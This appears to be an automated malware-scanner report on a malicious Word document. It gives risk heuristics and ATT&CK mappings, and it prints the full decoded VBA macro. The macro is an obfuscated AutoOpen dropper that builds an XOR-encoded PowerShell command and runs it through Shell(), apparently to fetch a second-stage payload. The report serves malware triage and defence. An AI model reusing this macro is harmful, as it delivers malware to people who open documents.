MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro. The macro uses string concatenation to obfuscate a call to PowerShell, likely to download and execute a second-stage payload. The presence of the Shell() call and the ClamAV detection strongly indicate malicious intent.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-7148147-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7148147-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
lEOfk = CDate(NijFtE + Sin(92989 + 14658) * 55519 * CInt(93711)) RmlwUGm = iAUArwUoM + Shell(AipJqinfzr + TNhkXARAPw + SLtFzQwmCwt, 12073 - 12073) lWfTs = CDate(17733) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11710 bytes |
SHA-256: 963f9f140957cae1602828551827c42577008db34f4bfb64d24da45c5fe08d51 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
178 of 352 identifiers look randomly generated (e.g. 'r91G91d95L21r0K'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rijHcrGiz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ziLtmSwPswqr"
Function BoCFr()
On Error Resume Next
cQnzVI = CByte(wjcRFY)
raFUz = 24061
wjhVO = CDate(39275)
dEGMS = CDate(sWGhw + Sin(6690 + 10844) * 18613 * CInt(8890))
VNOkNp = 49756
tbYAhQ = KrFDQh
sWPKUEaQElX = "OwerSHell" + " & ((vARiAb" + "lE '*mDR*')" + ".NAM" + "E[3,11,2]-jOI" + "n'') ( " + Chr(34) + "$( " + "SeT-VaR" + "iAble 'Of" + "S' '')" + Chr(34) + "+[St"
BSIrC = CByte(tpTfNF)
mZGuD = 64734
VNBbpD = CDate(79124)
wlKsz = CDate(YUNFn + Sin(5992 + 84986) * 79140 * CInt(74451))
lDEnbd = 91099
ZfOzkl = mGkQqC
PVUviik = "RiNG]('11E7" + "6>77G121~" + "66>90>" + "76E" + "15N18r15K65N" + "74d88>2r64d77" + "~69~74d76K91~" + "15r93L78L65!" + "75!64" + "N6"
CDfaGC = CByte(prnMv)
mCEHMF = 11008
lMsiR = CDate(4259)
NwwlF = CDate(ZZjcPf + Sin(29461 + 24104) * 8468 * CInt(63497))
zFfVUG = 50017
PwIcjO = rlaOs
SorcI = "6K20N11>" + "64N107E99~109E6" + "7L15~18~1" + "5!65d74N88r2!"
jKjfIS = CByte(tqihr)
YLGYK = 65434
TVLhwp = CDate(24561)
HAwbpu = CDate(fsdAiK + Sin(10770 + 30758) * 64633 * CInt(25423))
VKdkGO = 45882
UhKRhX = ACoSD
HiQKGctJU = "64>77>69r74>" + "76~9" + "1G15d124E86d92" + "d91>74!66E1r97" + "~74L91r1!12" + "0K74E77d108d6"
BoCFr = sWPKUEaQElX + PVUviik + SorcI + HiQKGctJU
End Function
Function WRwBMT()
On Error Resume Next
IjNFdT = CByte(VfQqS)
JhGlj = 62209
NoszMo = CDate(38155)
XDhFzJ = CDate(wwvTj + Sin(81038 + 10103) * 32866 * CInt(78315))
SYjOw = 1713
ojrDfq = rGrdfl
MzJmXK = "7!70!" + "74G65" + "!9" + "1~2" + "0>11d96K123E9" + "8~93" + "G117r1" + "5K18K15d"
kHXDNX = CByte(cXrNz)
IUaNl = 2024
sRiQM = CDate(88421)
zjTkI = CDate(LYkiwV + Sin(20079 + 12098) * 42356 * CInt(67634))
dKGZjU = 44967
cYdDE = tThmls
zImjnr = "8K71N9" + "1d" + "91E95L2" + "1d0L0E31G24r" + "26r26>75N65~7" + "8N69!75K1K76K64" + "L66G0!2" + "5L" + "87d88>78N93L1"
roHWic = CByte(oQGvBa)
fWOvr = 74391
bzZfM = CDate(42696)
vzUUvT = CDate(uQWMpA + Sin(54209 + 84903) * 59920 * CInt(28093))
nvdMhr = 86686
wTjKG = zNVTjn
OrCUK = "25>74r77!92L0" + ">111d71" + "r91G91d95L21r0K" + "0!64K88L65L2L91" + "L93~"
LZpjSL = CByte(PCzkq)
jVQCtn = 16828
VhzMNd = CDate(39203)
SmjAsM = CDate(nLmLW + Sin(14124 + 76839) * 77112 * CInt(62544))
nJHtz = 70136
ObjQUQ = BIjGL
IRcYpYvuX = "78E65r92L" + "95N64>" + "93N91L1" + "d76G64~66E0r95d" + "90!77L0N119d72N" + "98N121d74L28!0" + "r111G71>91L91K"
WhtQc = CByte(BnQwVV)
ZFjOR = 73998
jjQbQG = CDate(80935)
FuAXB = CDate(dhndFl + Sin(62409 + 72361) * 98339 * CInt(24521))
ZwwcqL = 49357
SjTclu = njpRi
nvkNwXDkk = "95d21>0L0L88r88" + "L88L1r66L92G68>" + "95d93E64L74d" + "68K91N1r93!9" + "0>0>77N72E107"
kTwhD = CByte(wZWdTz)
PQiBiU = 68685
kSwMzn = CDate(8376)
BRTMTB = CDate(UuVIaC + Sin(5138 + 31266) * 83616 * CInt(69682))
taLYGc = 38919
TbfMkw = KIHNMH
NiUfH = "~73!123L1" + "26G104G" + "117E127K0" + "r111r" + "71r91G"
CGbUUc = CByte(ohVZJ)
srOuOn = 88399
lHiOTK = CDate(72454)
PMPvo = CDate(akcnN + Sin(58595 + 50835) * 9511 * CInt(11736))
FEbHKZ = 61824
mVnwuU = ualUz
DoCaDpHjq = "91r95E21L" + "0L0N88G8" + "8N88r1L" + "66G78K68" + "r22G" + "30>26K23~3" + "1>31N1N93!9" + "0L0>" + "106!106N12"
MiTjBw = CByte(wXpZvE)
MUlMu = 13044
UCCdr = CDate(69084)
zjMRMY = CDate(pjCqP + Sin(51508 + 66186) * 91629 * CInt(35911))
ZfGtD = 8088
vvQtqF = sprEdE
pbRTGpYnV = "4!127L12" + "6~30d25E22K8" + "7>105K0" + "G11" + "1G71K91~9" + "1E95~21!0K0" + "N88~88>88~1N6" + "8~" + "90d91K74~92~"
fdmZjO = CByte(wSDJiX)
wPAFj = 77626
WjJMb = CDate(73582)
voVALY = CDate(VCkzS + Sin(9718 + 24806) * 24115 * CInt(10347))
pZOIr = 74874
tqiPBi = PjpTt
HZKGE = "71L64d95K1d" + "68N70G74K65E" + "77N70d74!65~91" + "!74~" + "76d71G1K" + "76r64E66N" + "0L22K1" + "05r" + "30r23G110~" + "22"
WRwBMT = MzJmXK + zImjnr + OrCUK + IRcYpYvuX + nvkNwXDkk + NiUfH + DoCaDpHjq + pbRTGpYnV + HZKGE
End Function
Function mjTkawt()
On Error Resume Next
KMSMJ = CByte(iTlDOu)
zSiavT = 68050
Rlcjm = CDate(53763)
ojRzdY = CDate(GUAGol + Sin(30544 + 88231) * 5561 * CInt(31708))
YYpcb = 31226
JSacdw = piznvF
TtzsZNl = "E0E8>1d124L95r6" + "7K70!91d" + "7r8d111r8G6d20>" + "11>110G10" + "9N94d88N12"
XiMGcJ = CByte(LFUHn)
hkqEEa = 28928
pTZuQp = CDate(36076)
THztYf = CDate(iswSj + Sin(83794 + 52997) * 9755 * CInt(67321))
mXwlzZ = 17517
MpvSUa = vvzDY
STBPDqCS = "2E15E18!1" + "5d11~76!77>12" + "1E66N90~7" + "6L1G65~74L" + "87K91L7K30~3" + "~15N25"
HwNOqv = CByte(zXSwj)
cLEHQ = 22972
zciAFC = CDate(33498)
qmXiTl = CDate(KblHE + Sin(41875 + 78606) * 93934 * CInt(68224))
EiThN = 42045
iudkSm = udPcw
fbAjQ = "r31N29!25~2" + "6>27>6E20N11" + ">70d91L109>9" + "5G125~1" + "5G18>15d" + "11K7" + "4>65E89N2" + "1>91~74G66d95"
bQIfwL = CByte(HnzXA)
nQapYv = 52035
kqWfO = CDate(14231)
wANYk = CDate(ELkivW + Sin(8241 + 27238) * 35899 * CInt(25376))
kWJvow = 64977
wzIED = KtLYA
ZwjQYCG = "K15d4" + "N1" + "5r" + "8L115>8!"
BBwDR = CByte(PjRwEs)
VlDjZ = 76168
DiZUDf = CDate(95201)
VhfSr = CDate(WBrBs + Sin(63596 + 21542) * 17055 * CInt(84681))
kuFHL = 43398
ViCXj = qUCrw
MYoCqTMRU = "15r4E15>11G" + "110!109E94~88" + "G122N15d" + "4L15E8d"
mjTkawt = TtzsZNl + STBPDqCS + fbAjQ + ZwjQYCG + MYoCqTMRU
End Function
Function IrrfdNnR()
On Error Resume Next
zLLYu = CByte(KwUcZl)
ZGdBT = 98677
qKQAM = CDate(30891)
GwMIXc = CDate(wkJji + Sin(98599 + 68580) * 85869 * CInt(18278))
UQkZSt = 64585
SETKmi = zCTdG
kzbcmC = "1~74!87" + "G7" + "4d8!20N73~64G" + "93~" + "74!"
ulcwBZ = CByte(IwVTPI)
zbPtn = 23928
VJusQ = CDate(68688)
BzQtKn = CDate(mEwYW + Sin(20242 + 9132) * 31933 * CInt(81749))
DAROMO = 22442
Evszjf = jpvfIU
pukRFMdkjWz = "78" + "!76>71~7G1" + "1d12" + "4>95" + "E71K85>89" + "L15K" + "70d65!15G11N9"
twDESP = CByte(VrfURQ)
rHrTwC = 85195
Usmik = CDate(59265)
uvLcia = CDate(JccoJ + Sin(10529 + 81062) * 83908 * CInt(83282))
qlPVr = 43354
pFjckj = VvuVs
hFBnKO = "6>123G98~9" + "3~117G6K84N" + "91G" + "93E8" + "6~84E1" + "1K64r107" + "L99K109~67G1G10" + "7G"
LTdBK = CByte(fwwKMm)
QTzqYc = 77717
ifsRz = CDate(70154)
Rmrozz = CDate(QHRVf + Sin(85360 + 25791) * 70501 * CInt(52329))
opYLPD = 61778
rSDctU = qFVGJj
ZEnoaOhJoHa = "64N" + "88E65!67L64!" + "78N75r105>70G67" + "~74>7d1" + "1d124~95N71r" + "85G89" + "r1>123K" + "64r124K91r93r70" + "L65d72!7G6K3r15"
utzEzZ = CByte(hEYRDz)
KkUBW = 72715
iuGbWE = CDate(23501)
WLzEoH = CDate(NDmwK + Sin(20941 + 53335) * 17124 * CInt(11320))
LnPqh = 79430
UjmuSH = qIjtI
NXAKj = "L11r70>91K109d9" + "5!125d" + "6K20G124~91" + ">78" + "K93" + ">91~2!12"
EniClA = CByte(CVawDE)
vmjDqw = 48303
NjaWEo = CDate(53455)
pJEXA = CDate(jKUEzb + Sin(38918 + 5470) * 50107 * CInt(58321))
vkZRq = 40201
IUIPu = ShihE
XGqtWl = "7G93L64d" + "76>74>92L92!" + "15>11G70~9" + "1N10" + "9~95L125>20" + "N77"
cFKGw = CByte(vTTzv)
dFowj = 54341
mqWDi = CDate(23465)
SRYiE = CDate(jtJLp + Sin(9739 + 78201) * 16557 * CInt(24536))
OzJSKF = 89012
YWwCj = NkqCSL
HlwLMSXCWwN = "!93E74L78L" + "68E20" + ">82N76d78~91L76" + "G71L84E88L93L70" + "d91G74L2L71E" + "64!92"
duGwZ = CByte(zjjJsb)
uzGCc = 75202
onCiV = CDate(40735)
FBHIjX = CDate(wQtnLD + Sin(9145 + 12226) * 93735 * CInt(92113))
EbGFPV = 74362
mmfYH = nAlQoD
qlwnQ = "!91N15r11K" + "112L1G106N87r76" + ">74G95r91G70~" + "64!" + "65L1"
YzhqGO = CByte(iAjtSV)
QdWbz = 7289
mjIMWt = CDate(21927)
BiJzCk = CDate(fIUSFb + Sin(73354 + 65812) * 96073 * CInt(95501))
RBmAQm = 42965
LRGVi = dlPDs
mLPhjw = "E98~74E92L92>7" + "8E72G74N" + "20K82" + "r82'-SpliT" + " '"
PEABK = CByte(Ohuqj)
mhUTLf = 7882
pUQVwn = CDate(8420)
ojAoi = CDate(pwMhl + Sin(94590 + 18463) * 38597 * CInt(26127))
ILwjUY = 47671
OChoBv = lRHrou
uWJShzvBFcI = "g'-SPlIT" + " '~' -s" + "PLIt'k'-sPlIT" + "'r'-SPlIt " + "'>'-SpLIT " + "'E'-s" + "pLIt" + "'D'-"
IrrfdNnR = kzbcmC + pukRFMdkjWz + hFBnKO + ZEnoaOhJoHa + NXAKj + XGqtWl + HlwLMSXCWwN + qlwnQ + mLPhjw + uWJShzvBFcI
End Function
Function SZzuCz()
On Error Resume Next
hLXsb = QSYpn
UZPlQ = 1541
WtZRU = 23843
OXWZA = CDate(3666)
imVGj = CByte(uFPDt)
vEcpIh = CDate(DfoOka + Sin(29691 + 61926) * 66098 * CInt(41834))
ItwwlwilZVf = "SPlIt 'n'" + "-sPLiT'L'-sp" + "lIT'!' |" + "FORE" + "aCh-object{" + "[cHar] " + "( $_-BxoR 0x"
GwzRFZ = NYhXW
RmjzK = 97830
wMZFC = 28734
XZpJoQ = CDate(60238)
ATSsi = CByte(ACTqMD)
pUpwf = CDate(ZKHFUd + Sin(18641 + 8301) * 94945 * CInt(99914))
TlIlDlLhww = "2F )" + " })+" + Chr(34) + "$(SEt-ITeM 'V" + "ARiABLE:o"
jUDvZD = JwSZE
zJjHZ = 56348
tDNbsM = 70925
HuBnrn = CDate(65472)
aSTbpd = CByte(RfCkvP)
LtwWmC = CDate(YZtohn + Sin(9850 + 27559) * 91339 * CInt(63178))
mizYTwu = "Fs' ' ') " + Chr(34) + " " + ")"
SZzuCz = ItwwlwilZVf + TlIlDlLhww + mizYTwu
End Function
Function rXUMoaz()
On Error Resume Next
iRMffW = CDate(19087)
KOYOJI = 35345
mIQkZz = 18580
LqEro = CByte(JzZtwl)
FFtWwu = lfwLi
bQGijD = CDate(jZmKQi + Sin(37506 + 41931) * 80108 * CInt(90027))
MwXkV = CDate(82893)
pcSAH = 73077
SrwJw = 25539
PKvXl = CByte(QEEET)
BnzcV = MfGlw
YHRjv = CDate(lZPdbW + Sin(80333 + 15915) * 344 * CInt(41898))
DDFEpH = CDate(77759)
wbzfA = 52117
KYLHE = 79442
bdidE = CByte(cCjit)
djjdQI = PRKJt
wliMr = CDate(mXtCIz + Sin(2815 + 39704) * 55665 * CInt(67064))
Qzakdi = CDate(43039)
VlJZEI = 63483
amppLl = 34299
wfiaW = CByte(MaEpj)
WPzzHR = MiYLY
kltQnk = CDate(rXKYHb + Sin(78394 + 35605) * 73643 * CInt(53347))
bCCfzN = CDate(96581)
ljVCuQ = 47460
pDjSCP = 54199
bioJu = CByte(Gumib)
PBTfv = jJYLj
mzHBJ = CDate(ljcvMB + Sin(97720 + 19751) * 12455 * CInt(87180))
End Function
Function PTiOwW()
On Error Resume Next
arlkBF = CDate(76188)
nzzWX = 33212
Rdwls = 97094
RauRvJ = CByte(jMfqr)
UjTUnM = fzvNO
jivuiV = CDate(QCwIdL + Sin(29039 + 65897) * 58470 * CInt(88863))
DmiQGKb = iwjsH + Chr(zLCYaDRZ + 80 + EPrdJTEj)
WwYpCn = CDate(54894)
RnYTJ = 65469
RVFqNX = 64870
NkLJGp = CByte(kGYLu)
HZGjWZ = zPzSP
ANdpfX = CDate(jIzKF + Sin(60315 + 19861) * 90580 * CInt(72806))
ErQYDR = CDate(49206)
aSsDw = 49112
mYrLpP = 30451
pDMDm = CByte(vOWJd)
PcfWHj = kkdcKt
pAowXE = CDate(jGOdY + Sin(642 + 47654) * 16728 * CInt(23326))
PTiOwW = LMHAw + DmiQGKb + BoCFr + WRwBMT + mjTkawt + IrrfdNnR + SZzuCz
pVNZqz = CDate(16445)
ilOHIj = 9480
ipFiSP = 13593
fjElno = CByte(LhQHMn)
zijiY = DsIws
TzXju = CDate(HzbAfz + Sin(97131 + 86598) * 12369 * CInt(16217))
End Function
Function GnSTEPSiMd(TNhkXARAPw)
On Error Resume Next
pTrmzO = CDate(10421)
EuADh = 79907
czwHXv = 36725
hqbwP = CByte(YtUbi)
dpKwkC = URuNIC
KaSjdz = CDate(zCidwi + Sin(1262 + 42310) * 4353 * CInt(61761))
hzkuc = CDate(79429)
Kaqqw = 74843
wOJTak = 67373
ozoGw = CByte(PhNpQz)
BDCMP = RGwJiL
lEOfk = CDate(NijFtE + Sin(92989 + 14658) * 55519 * CInt(93711))
RmlwUGm = iAUArwUoM + Shell(AipJqinfzr + TNhkXARAPw + SLtFzQwmCwt, 12073 - 12073)
lWfTs = CDate(17733)
VSXkw = 16186
QFzQRX = 40319
MABECL = CByte(YmGWVz)
iDqWM = Plljv
vcjsNO = CDate(lfbRaV + Sin(89567 + 96079) * 15372 * CInt(56426))
End Function
Sub AutoOpen()
On Error Resume Next
ccbcw = CDate(81059)
pzMmG = 59228
PwTTt = 38775
vbdnO = CByte(LNFoY)
vhpFr = bsHsjN
KLbEda = CDate(QThrDP + Sin(65258 + 97756) * 38763 * CInt(18814))
Application.Run LTwTfiTG + "GnSTEPSiMd" + ibwiaIvGKp, vmMobv + PTiOwW + iWCKtGFiquL
hckSu = CDate(62849)
ANbls = 63005
PvjEmU = 72771
kIidI = CByte(UAJwF)
kZObuA = nVOYm
MbHwO = CDate(zmHiF + Sin(7592 + 24063) * 20044 * CInt(61842))
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.